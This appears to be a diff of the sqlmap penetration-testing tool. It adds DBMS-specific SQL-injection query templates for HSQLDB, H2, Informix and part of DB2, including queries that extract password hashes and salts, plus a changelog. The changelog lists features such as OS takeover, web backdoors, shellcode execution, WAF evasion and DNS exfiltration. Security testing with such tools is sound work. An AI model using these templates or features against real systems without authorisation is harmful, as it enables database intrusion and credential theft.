+            <blind query="SELECT ENTRY_VALUE FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,%s AS ENTRY_VALUE FROM %s) AS qq WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
+        </dump_table>
+        <search_db>
+            <inband query="SELECT schemaname FROM syscat.schemata WHERE %s" condition="schemaname"/>
+            <blind query="SELECT schemaname FROM (SELECT DISTINCT(schemaname) FROM syscat.schemata WHERE %s) AS qq" count="SELECT COUNT(DISTINCT(schemaname)) FROM syscat.schemata WHERE %s" condition="schemaname"/>
+        </search_db>
+        <search_table>
+            <inband query="SELECT tabschema,tabname FROM sysstat.tables WHERE %s" condition="tabname" condition2="tabschema"/>
+            <blind query="SELECT tabschema FROM (SELECT DISTINCT(tabschema) FROM sysstat.tables WHERE %s) AS qq" query2="SELECT DISTINCT(tabname) FROM sysstat.tables WHERE tabschema='%s'" count="SELECT COUNT(DISTINCT(tabschema)) FROM sysstat.tables WHERE %s" count2="SELECT COUNT(tabname) FROM sysstat.tables WHERE tabschema='%s'" condition="tabname" condition2="tabschema"/>
+        </search_table>
+        <search_column>
+            <inband query="SELECT tabschema,tabname FROM sysstat.columns WHERE %s" condition="colname" condition2="tabschema" condition3="tabname"/>
+            <blind query="SELECT tabschema FROM (SELECT DISTINCT(tabschema) FROM sysstat.columns WHERE %s) AS qq" query2="SELECT DISTINCT(tabname) FROM sysstat.columns WHERE tabschema='%s'" count="SELECT COUNT(DISTINCT(tabschema)) FROM sysstat.columns WHERE %s" count2="SELECT COUNT(DISTINCT(tabname)) FROM sysstat.columns WHERE tabschema='%s'" condition="colname" condition2="tabschema" condition3="tabname"/>
+        </search_column>
+    </dbms>
+
+    <!-- Hyper SQL Database -->
+    <dbms value="HSQLDB">
+        <cast query="CAST(%s AS LONGVARCHAR)"/>
+        <length query="CHAR_LENGTH(%s)"/>
+        <isnull query="IFNULL(%s,' ')"/>
+        <delimiter query="||"/>
+        <limit query="LIMIT %d %d" query2="LIMIT %d OFFSET %d"/>
+        <limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
+        <limitgroupstart query="1"/>
+        <limitgroupstop query="2"/>
+        <limitstring query=" LIMIT "/>
+        <order query="ORDER BY %s ASC"/>
+        <count query="COUNT(%s)"/>
+        <comment query="--" query2="/*" query3="//"/>
+        <substring query="SUBSTR((%s),%d,%d)"/>
+        <concatenate query="CONCAT(%s,%s)"/>
+        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
+        <hex query="RAWTOHEX(%s)"/>
+        <inference query="ASCII(SUBSTR((%s),%d,1))>%d"/>
+        <banner query="DATABASE_VERSION()"/>
+        <current_user query="CURRENT_USER"/>
+        <current_db query="DATABASE()"/>
+        <hostname/>
+        <table_comment/>
+        <column_comment/>
+        <is_dba query="SELECT ADMIN FROM INFORMATION_SCHEMA.USERS WHERE NAME=CURRENT_USER"/>
+        <check_udf/>
+        <users>
+            <!-- LIMIT is needed at start for v1.7 this gets mangled unless no-cast is used -->
+            <blind query="SELECT LIMIT %d 1 DISTINCT(user) FROM INFORMATION_SCHEMA.SYSTEM_USERS ORDER BY user" count="SELECT COUNT(DISTINCT(user)) FROM INFORMATION_SCHEMA.SYSTEM_USERS"/>
+            <inband query="SELECT user FROM INFORMATION_SCHEMA.SYSTEM_USERS ORDER BY user"/>
+        </users>
+        <passwords>
+            <!-- Passwords only shown in later versions &gt;=2.0  -->
+            <blind query="SELECT LIMIT %d 1 DISTINCT(password_digest) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s' ORDER BY password_digest" count="SELECT COUNT(DISTINCT(password_digest)) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s'"/>
+            <inband query="SELECT user_name,password_digest FROM INFORMATION_SCHEMA.SYSTEM_USERS ORDER BY user_name" condition="user_name"/>
+        </passwords>
+        <privileges/>
+        <roles/>
+        <statements/>
+        <dbs>
+            <blind query="SELECT LIMIT %d 1 DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS ORDER BY table_schem" count="SELECT COUNT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS"/>
+            <inband query="SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS ORDER BY table_schem" />
+        </dbs>
+        <tables>
+            <blind query="SELECT LIMIT %d 1 table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s' ORDER BY table_name" count="SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s'"/>
+            <inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES ORDER BY table_schem" condition="table_schem"/>
+        </tables>
+        <columns>
+            <blind query="SELECT column_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s' ORDER BY column_name" query2="SELECT column_type FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schem='%s'" count="SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s'" condition="column_name"/>
+            <inband query="SELECT column_name,type_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s' ORDER BY column_name" condition="column_name"/>
+        </columns>
+        <dump_table>
+            <blind query="SELECT %s FROM %s.%s ORDER BY %s LIMIT 1 OFFSET %d" count="SELECT COUNT(*) FROM %s.%s"/>
+            <inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
+        </dump_table>
+        <search_db>
+            <blind query="SELECT DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s" count="SELECT COUNT(DISTINCT(table_schem)) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s" condition="table_schem"/>
+            <inband query="SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s" condition="table_schem"/>
+        </search_db>
+        <search_table>
+            <blind query="SELECT DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s'" count="SELECT COUNT(DISTINCT(table_schem)) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s'" condition="table_name" condition2="table_schem"/>
+            <inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s" condition="table_name" condition2="table_schem"/>
+        </search_table>
+        <search_column>
+            <blind query="SELECT DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_schem='%s'" count="SELECT COUNT(DISTINCT(table_schem)) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_schem='%s'" condition="column_name" condition2="table_schem" condition3="table_name"/>
+            <inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" condition="column_name" condition2="table_schem" condition3="table_name"/>
+        </search_column>
+    </dbms>
+
+    <dbms value="H2">
+        <cast query="CAST(%s AS LONGVARCHAR)"/>
+        <length query="CHAR_LENGTH(%s)"/>
+        <isnull query="IFNULL(%s,' ')"/>
+        <delimiter query="||"/>
+        <limit query="OFFSET %d LIMIT %d"/>
+        <limitregexp query="\s+OFFSET\s+([\d]+)\s+LIMIT\s+([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
+        <limitgroupstart query="1"/>
+        <limitgroupstop query="2"/>
+        <limitstring query=" OFFSET "/>
+        <order query="ORDER BY %s ASC"/>
+        <count query="COUNT(%s)"/>
+        <comment query="--" query2="//"/>
+        <substring query="SUBSTR((%s),%d,%d)"/>
+        <concatenate query="CONCAT(%s,%s)"/>
+        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
+        <hex query="RAWTOHEX(%s)"/>
+        <inference query="ASCII(SUBSTR((%s),%d,1))>%d"/>
+        <banner query="H2VERSION()"/>
+        <current_user query="CURRENT_USER"/>
+        <current_db query="DATABASE()"/>
+        <hostname/>
+        <table_comment/>
+        <column_comment/>
+        <is_dba query="SELECT CURRENT_USER='SA'"/>
+        <check_udf/>
+        <users>
+            <inband query="SELECT NAME FROM INFORMATION_SCHEMA.USERS"/>
+            <blind query="SELECT NAME FROM INFORMATION_SCHEMA.USERS OFFSET %d LIMIT 1" count="SELECT COUNT(NAME) FROM INFORMATION_SCHEMA.USERS"/>
+        </users>
+        <passwords/>
+        <privileges/>
+        <roles/>
+        <statements/>
+        <dbs>
+            <inband query="SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA"/>
+            <blind query="SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA OFFSET %d LIMIT 1" count="SELECT COUNT(SCHEMA_NAME) FROM INFORMATION_SCHEMA.SCHEMATA"/>
+        </dbs>
+        <tables>
+            <inband query="SELECT TABLE_SCHEMA,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES" condition="TABLE_SCHEMA"/>
+            <blind query="SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='%s' OFFSET %d LIMIT 1" count="SELECT COUNT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='%s'"/>
+        </tables>
+        <columns>
+            <blind query="SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='%s' AND TABLE_SCHEMA='%s' ORDER BY COLUMN_NAME" query2="SELECT TYPE_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s' AND TABLE_SCHEMA='%s'" count="SELECT COUNT(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='%s' AND TABLE_SCHEMA='%s'" condition="COLUMN_NAME"/>
+            <inband query="SELECT COLUMN_NAME,TYPE_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='%s' AND TABLE_SCHEMA='%s' ORDER BY COLUMN_NAME" condition="COLUMN_NAME"/>
+        </columns>
+        <dump_table>
+            <blind query="SELECT %s FROM %s.%s ORDER BY %s LIMIT 1 OFFSET %d" count="SELECT COUNT(*) FROM %s.%s"/>
+            <inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
+        </dump_table>
+        <search_db>
+            <blind query="SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" count="SELECT COUNT(SCHEMA_NAME) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="SCHEMA_NAME"/>
+            <inband query="SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="SCHEMA_NAME"/>
+        </search_db>
+        <search_table>
+            <blind query="SELECT DISTINCT(TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES WHERE %s ORDER BY 1" query2="SELECT DISTINCT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='%s' ORDER BY 1" count="SELECT COUNT(DISTINCT(TABLE_SCHEMA)) FROM INFORMATION_SCHEMA.TABLES WHERE %s" count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='%s'" condition="TABLE_NAME" condition2="TABLE_SCHEMA"/>
+            <inband query="SELECT TABLE_SCHEMA,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE %s" condition="TABLE_NAME" condition2="TABLE_SCHEMA"/>
+        </search_table>
+        <search_column>
+            <blind query="SELECT DISTINCT(TABLE_SCHEMA) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s ORDER BY 1" query2="SELECT DISTINCT(TABLE_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='%s' ORDER BY 1" count="SELECT COUNT(DISTINCT(TABLE_SCHEMA)) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='%s'" condition="column_name" condition2="TABLE_SCHEMA" condition3="TABLE_NAME"/>
+            <inband query="SELECT TABLE_SCHEMA,TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" condition="COLUMN_NAME" condition2="TABLE_SCHEMA" condition3="TABLE_NAME"/>
+        </search_column>
+    </dbms>
+
+    <!-- Informix -->
+    <!-- https://www.ibm.com/support/knowledgecenter/SSGU8G_11.70.0/com.ibm.sqlr.doc/ids_sqr_072.htm -->
+    <!-- https://www.ibm.com/support/knowledgecenter/SSGU8G_12.1.0/com.ibm.sec.doc/ids_am_041.htm -->
+    <dbms value="Informix">
+        <cast query="RTRIM(TO_CHAR(%s))"/>
+        <length query="CHAR_LENGTH(RTRIM(%s))"/>
+        <isnull query="NVL(%s,' ')"/>
+        <delimiter query="||"/>
+        <limit query="SELECT SKIP %d LIMIT 1"/>
+        <limitregexp query="\s+SKIP\s+([\d]+)\s*LIMIT\s*([\d]+)"/>
+        <limitgroupstart query="1"/>
+        <limitgroupstop query="2"/>
+        <limitstring query=" LIMIT "/>
+        <order query="ORDER BY %s ASC"/>
+        <count query="COUNT(%s)"/>
+        <comment query="--"/>
+        <substring query="SUBSTR((%s),%d,%d)"/>
+        <concatenate query="%s||%s"/>
+        <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END) FROM SYSMASTER:SYSDUAL"/>
+        <hex query="HEX(%s)"/>
+        <!-- http://www.dbforums.com/showthread.php?1660588-select-first-and-union&p=6478613#post6478613 -->
+        <inference query="ASCII(SUBSTR((SELECT * FROM (%s)),%d,1))>%d"/>
+        <banner query="SELECT DBINFO('VERSION','FULL') FROM SYSMASTER:SYSDUAL"/>
+        <current_user query="SELECT USER FROM SYSMASTER:SYSDUAL"/>
+        <current_db query="SELECT DBINFO('DBNAME') FROM SYSMASTER:SYSDUAL"/>
+        <hostname query="SELECT DBINFO('DBHOSTNAME') FROM SYSMASTER:SYSDUAL"/>
+        <table_comment/>
+        <column_comment/>
+        <is_dba query="(SELECT USERTYPE FROM SYSUSERS WHERE USERNAME=USER)='D'"/>
+        <users>
+            <inband query="SELECT USERNAME FROM SYSUSERS"/>
+            <blind query="SELECT SKIP %d LIMIT 1 USERNAME FROM SYSUSERS ORDER BY USERNAME" count="SELECT COUNT(USERNAME) FROM SYSUSERS"/>
+        </users>
+        <passwords>
+            <inband query="SELECT USERNAME,HASHED_PASSWORD||':'||SALT FROM SYSUSER:SYSINTAUTHUSERS" condition="USERNAME"/>
+            <blind query="SELECT HASHED_PASSWORD||':'||SALT FROM SYSUSER:SYSINTAUTHUSERS WHERE USERNAME='%s'"/>
+        </passwords>
+        <privileges>
+            <inband query="SELECT USERNAME,USERTYPE FROM SYSUSERS" condition="USERNAME"/>
+            <blind query="SELECT USERTYPE FROM SYSUSERS WHERE USERNAME='%s'"/>
+        </privileges>
+        <roles/>
+        <statements/>
+        <dbs>
+            <inband query="SELECT NAME FROM SYSMASTER:SYSDATABASES"/>
+            <blind query="SELECT SKIP %d LIMIT 1 NAME FROM SYSMASTER:SYSDATABASES ORDER BY NAME" count="SELECT COUNT(NAME) FROM SYSMASTER:SYSDATABASES"/>
+        </dbs>
+        <tables>
+            <inband query="SELECT TABNAME FROM %s:SYSTABLES WHERE TABTYPE='T' AND TABID>99"/>
+            <blind query="SELECT SKIP %d LIMIT 1 TABNAME FROM %s:SYSTABLES WHERE TABTYPE='T' AND TABID>99 ORDER BY TABNAME" count="SELECT COUNT(TABNAME) FROM %s:SYSTABLES WHERE TABTYPE='T' AND TABID>99"/>
+        </tables>
+        <columns>
+            <inband query="SELECT COLNAME,COLTYPE FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s'" condition="COLNAME"/>
+            <blind query="SELECT SKIP %d LIMIT 1 COLNAME FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s' ORDER BY COLNAME" query2="SELECT COLTYPE FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s' AND COLNAME='%s'" count="SELECT COUNT(COLNAME) FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s'"  condition="COLNAME"/>
+        </columns>
+        <dump_table>
+            <inband query="SELECT %s FROM %s:%s"/>
+            <blind query="SELECT MIN(%s) FROM %s WHERE RTRIM(TO_CHAR(%s))>'%s'" query2="SELECT MAX(%s) FROM %s WHERE RTRIM(TO_CHAR(%s)) LIKE '%s'" count="SELECT COUNT(*) FROM %s:%s" count2="SELECT COUNT(DISTINCT %s) FROM %s"/>
+        </dump_table>
+        <search_db/>
+        <search_table/>
+        <search_column/>
+    </dbms>
+</root>
--- a/doc/AUTHORS
+++ b/doc/AUTHORS
@@ -1,3 +1,7 @@
-Bernardo Damele Assumpcao Guimaraes (inquis) - Lead developer
-<bernardo.damele@gmail.com>
-PGP Key ID: 0x05F5A30F
+Bernardo Damele Assumpcao Guimaraes (@inquisb)
+<bernardo@sqlmap.org>
+
+Miroslav Stampar (@stamparm)
+<miroslav@sqlmap.org>
+
+You can contact both developers by writing to dev@sqlmap.org
--- a/doc/CHANGELOG.md
+++ b/doc/CHANGELOG.md
@@ -0,0 +1,380 @@
+# Version 1.3 (2019-01-05)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.2...1.3)
+
+# Version 1.2 (2018-01-08)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.1...1.2)
+
+# Version 1.1 (2017-04-07)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.0...1.1)
+
+# Version 1.0 (2016-02-27)
+
+* Implemented support for automatic decoding of page content through detected charset.
+* Implemented mechanism for proper data dumping on DBMSes not supporting `LIMIT/OFFSET` like mechanism(s) (e.g. Microsoft SQL Server, Sybase, etc.).
+* Major improvements to program stabilization based on user reports.
+* Added new tampering scripts avoiding popular WAF/IPS mechanisms.
+* Fixed major bug with DNS leaking in Tor mode.
+* Added wordlist compilation made of the most popular cracking dictionaries.
+* Implemented multi-processor hash cracking routine(s).
+* Implemented advanced detection techniques for inband and time-based injections by usage of standard deviation method.
+* Old resume files are now deprecated and replaced by faster SQLite based session mechanism.
+* Substantial code optimization and smaller memory footprint.
+* Added option `-m` for scanning multiple targets enlisted in a given textual file.
+* Added option `--randomize` for randomly changing value of a given parameter(s) based on it's original form.
+* Added switch `--force-ssl` for forcing usage of SSL/HTTPS requests.
+* Added option `--host` for manually setting HTTP Host header value.
+* Added option `--eval` for evaluating provided Python code (with resulting parameter values) right before the request itself.
+* Added option `--skip` for skipping tests for given parameter(s).
+* Added switch `--titles` for comparing pages based only on their titles.
+* Added option `--charset` for forcing character encoding used for data retrieval.
+* Added switch `--check-tor` for checking if Tor is used properly.
+* Added option `--crawl` for multithreaded crawling of a given website starting from the target url.
+* Added option `--csv-del` for manually setting delimiting character used in CSV output.
+* Added switch `--hex` for using DBMS hex conversion function(s) for data retrieval.
+* Added switch `--smart` for conducting through tests only in case of positive heuristic(s).
+* Added switch `--check-waf` for checking of existence of WAF/IPS protection.
+* Added switch `--schema` to enumerate DBMS schema: shows all columns of all databases' tables.
+* Added switch `--count` to count the number of entries for a specific table or all database(s) tables.
+* Major improvements to switches `--tables` and `--columns`.
+* Takeover switch `--os-pwn` improved: stealthier, faster and AV-proof.
+* Added switch `--mobile` to imitate a mobile device through HTTP User-Agent header.
+* Added switch `-a` to enumerate all DBMS data.
+* Added option `--alert` to run host OS command(s) when SQL injection is found.
+* Added option `--answers` to set user answers to asked questions during sqlmap run.
+* Added option `--auth-file` to set HTTP authentication PEM cert/private key file.
+* Added option `--charset` to force character encoding used during data retrieval.
+* Added switch `--check-tor` to force checking of proper usage of Tor.
+* Added option `--code` to set HTTP code to match when query is evaluated to True.
+* Added option `--cookie-del` to set character to be used while splitting cookie values.
+* Added option `--crawl` to set the crawling depth for the website starting from the target URL.
+* Added option `--crawl-exclude` for setting regular expression for excluding pages from crawling (e.g. `"logout"`).
+* Added option `--csrf-token` to set the parameter name that is holding the anti-CSRF token.
+* Added option `--csrf-url` for setting the URL address for extracting the anti-CSRF token.
+* Added option `--csv-del` for setting the delimiting character that will be used in CSV output (default `,`).
+* Added option `--dbms-cred` to set the DBMS authentication credentials (user:password).
+* Added switch `--dependencies` for turning on the checking of missing (non-core) sqlmap dependencies.
+* Added switch `--disable-coloring` to disable console output coloring.
+* Added option `--dns-domain` to set the domain name for usage in DNS exfiltration attack(s).
+* Added option `--dump-format` to set the format of dumped data (`CSV` (default), `HTML` or `SQLITE`).
+* Added option `--eval` for setting the Python code that will be evaluated before the request.
+* Added switch `--force-ssl` to force usage of SSL/HTTPS.
+* Added switch `--hex` to force usage of DBMS hex function(s) for data retrieval.
+* Added option `-H` to set extra HTTP header (e.g. `"X-Forwarded-For: 127.0.0.1"`).
+* Added switch `-hh` for showing advanced help message.
+* Added option `--host` to set the HTTP Host header value.
+* Added switch `--hostname` to turn on retrieval of DBMS server hostname.
+* Added switch `--hpp` to turn on the usage of HTTP parameter pollution WAF bypass method.
+* Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS protection.
+* Added switch `--ignore-401` to ignore HTTP Error Code 401 (Unauthorized).
+* Added switch `--invalid-bignum` for usage of big numbers while invalidating values.
+* Added switch `--invalid-logical` for usage of logical operations while invalidating values.
+* Added switch `--invalid-string` for usage of random strings while invalidating values.
+* Added option `--load-cookies` to set the file containing cookies in Netscape/wget format.
+* Added option `-m` to set the textual file holding multiple targets for scanning purposes.
+* Added option `--method` to force usage of provided HTTP method (e.g. `PUT`).
+* Added switch `--no-cast` for turning off payload casting mechanism.
+* Added switch `--no-escape` for turning off string escaping mechanism.
+* Added option `--not-string` for setting string to be matched when query is evaluated to False.
+* Added switch `--offline` to force work in offline mode (i.e. only use session data).
+* Added option `--output-dir` to set custom output directory path.
+* Added option `--param-del` to set character used for splitting parameter values.
+* Added option `--pivot-column` to set column name that will be used while dumping tables by usage of pivot(ing).
+* Added option `--proxy-file` to set file holding proxy list.
+* Added switch `--purge-output` to turn on safe removal of all content(s) from output directory.
+* Added option `--randomize` to set parameter name(s) that will be randomly changed during sqlmap run.
+* Added option `--safe-post` to set POST data for sending to safe URL.
+* Added option `--safe-req` for loading HTTP request from a file that will be used during sending to safe URL.
+* Added option `--skip` to skip testing of given parameter(s).
+* Added switch `--skip-static` to skip testing parameters that not appear to be dynamic.
+* Added switch `--skip-urlencode` to skip URL encoding of payload data.
+* Added switch `--skip-waf` to skip heuristic detection of WAF/IPS protection.
+* Added switch `--smart` to conduct thorough tests only if positive heuristic(s).
+* Added option `--sql-file` for setting file(s) holding SQL statements to be executed (in case of stacked SQLi).
+* Added switch `--sqlmap-shell` to turn on interactive sqlmap shell prompt.
+* Added option `--test-filter` for test filtration by payloads and/or titles (e.g. `ROW`).
+* Added option `--test-skip` for skipping tests by payloads and/or titles (e.g. `BENCHMARK`).
+* Added switch `--titles` to turn on comparison of pages based only on their titles.
+* Added option `--tor-port` to explicitly set Tor proxy port.
+* Added option `--tor-type` to set Tor proxy type (`HTTP` (default), `SOCKS4` or `SOCKS5`).
+* Added option `--union-from` to set table to be used in `FROM` part of UNION query SQL injection.
+* Added option `--where` to set `WHERE` condition to be used during the table dumping.
+* Added option `-X` to exclude DBMS database table column(s) from enumeration.
+* Added option `-x` to set URL of sitemap(.xml) for target(s) parsing.
+* Added option `-z` for usage of short mnemonics (e.g. `"flu,bat,ban,tec=EU"`).
+
+# Version 0.9 (2011-04-10)
+
+* Rewritten SQL injection detection engine.
+* Support to directly connect to the database without passing via a SQL injection, option `-d`.
+* Added full support for both time-based blind SQL injection and error-based SQL injection techniques.
+* Implemented support for SQLite 2 and 3.
+* Implemented support for Firebird.
+* Implemented support for Microsoft Access, Sybase and SAP MaxDB.
+* Extended old `--dump -C` functionality to be able to search for specific database(s), table(s) and column(s), option `--search`.
+* Added support to tamper injection data with option `--tamper`.
+* Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack.
+* Added support to enumerate roles on Oracle, `--roles` switch.
+* Added support for SOAP based web services requests.
+* Added support to fetch unicode data.
+* Added support to use persistent HTTP(s) connection for speed improvement, switch `--keep-alive`.
+* Implemented several optimization switches to speed up the exploitation of SQL injections.
+* Support to test and inject against HTTP Referer header.
+* Implemented HTTP(s) proxy authentication support, option `--proxy-cred`.
+* Implemented feature to speedup the enumeration of table names.
+* Support for customizable HTTP(s) redirections.
+* Support to replicate the back-end DBMS tables structure and entries in a local SQLite 3 database, switch `--replicate`.
+* Support to parse and test forms on target url, switch `--forms`.
+* Added switches to brute-force tables names and columns names with a dictionary attack, `--common-tables` and `--common-columns`. Useful for instance when system table `information_schema` is not available on MySQL.
+* Basic support for REST-style URL parameters by using the asterisk (`*`) to mark where to test for and exploit SQL injection.
+* Added safe URL feature, `--safe-url` and `--safe-freq`.
+* Added switch `--text-only` to strip from the HTTP response body the HTML/JS code and compare pages based only on their textual content.
+* Implemented few other features and switches.
+* Over 100 bugs fixed.
+* Major code refactoring.
+* User's manual updated.
+
+# Version 0.8 (2010-03-14)
+
+* Support to enumerate and dump all databases' tables containing user provided column(s) by specifying for instance `--dump -C user,pass`. Useful to identify for instance tables containing custom application credentials.
+* Support to parse `-C` (column name(s)) when fetching columns of a table with `--columns`: it will enumerate only columns like the provided one(s) within the specified table.
+* Support for takeover features on PostgreSQL 8.4.
+* Enhanced `--priv-esc` to rely on new Metasploit Meterpreter's 'getsystem' command to elevate privileges of the user running the back-end DBMS instance to SYSTEM on Windows.
+* Automatic support in `--os-pwn` to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP, but there is a writable folder within the web server document root.
+* Fixed web backdoor functionality for `--os-cmd`, `--os-shell` and `--os-pwn` useful when web application does not support stacked queries.
+* Added support to properly read (`--read-file`) also binary files via PostgreSQL by injecting sqlmap new `sys_fileread()` user-defined function.
+* Updated active fingerprint and comment injection fingerprint for MySQL 5.1, MySQL 5.4 and MySQL 5.5.
+* Updated active fingerprint for PostgreSQL 8.4.
+* Support for NTLM authentication via python-ntlm third party library, http://code.google.com/p/python-ntlm/, `--auth-type NTLM`.
+* Support to automatically decode `deflate`, `gzip` and `x-gzip` HTTP responses.
+* Support for Certificate authentication, `--auth-cert` option added.
+* Added support for regular expression based scope when parsing Burp or Web Scarab proxy log file (`-l`), `--scope`.
+* Added option `-r` to load a single HTTP request from a text file.
+* Added switch `--ignore-proxy` to ignore the system default HTTP proxy.
+* Added support to ignore Set-Cookie in HTTP responses, `--drop-set-cookie`.
+* Added support to specify which Google dork result page to parse, `--gpage` to be used together with `-g`.
+* Major bug fix and enhancements to the multi-threading (`--threads`) functionality.
+* Fixed URL encoding/decoding of GET/POST parameters and Cookie header.
+* Refactored `--update` to use `python-svn` third party library if available or `svn` command to update sqlmap to the latest development version from subversion repository.
+* Major bugs fixed.
+* Cleanup of UDF source code repository, https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack.
+* Major code cleanup.
+* Added simple file encryption/compression utility, extra/cloak/cloak.py, used by sqlmap to decrypt on the fly Churrasco, UPX executable and web shells consequently reducing drastically the number of anti-virus software that mistakenly mark sqlmap as a malware.
+* Updated user's manual.
+* Created several demo videos, hosted on YouTube (http://www.youtube.com/user/inquisb) and linked from http://sqlmap.org/demo.html.
+
+# Version 0.8 release candidate (2009-09-21)
+
+* Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (`--os-bof`) to automatically bypass DEP memory protection.
+* Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable.
+* Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys.
+* Added options for MySQL and PostgreSQL to inject custom user-defined functions.
+* Added support for `--first` and `--last` so the user now has even more granularity in what to enumerate in the query output.
+* Minor enhancement to save the session by default in 'output/hostname/session' file if `-s` option is not specified.
+* Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system.
+* Minor bugs fixed.
+* Major code refactoring.
+
+# Version 0.7 (2009-07-25)
+
+* Adapted Metasploit wrapping functions to work with latest 3.3 development version too.
+* Adjusted code to make sqlmap 0.7 to work again on Mac OSX too.
+* Reset takeover OOB features (if any of `--os-pwn`, `--os-smbrelay` or `--os-bof` is selected) when running under Windows because msfconsole and msfcli are not supported on the native Windows Ruby interpreter. This make sqlmap 0.7 to work again on Windows too.
+* Minor improvement so that sqlmap tests also all parameters with no value (eg. par=).
+* HTTPS requests over HTTP proxy now work on either Python 2.4, 2.5 and 2.6+.
+* Major bug fix to sql-query/sql-shell features.
+* Major bug fix in `--read-file` option.
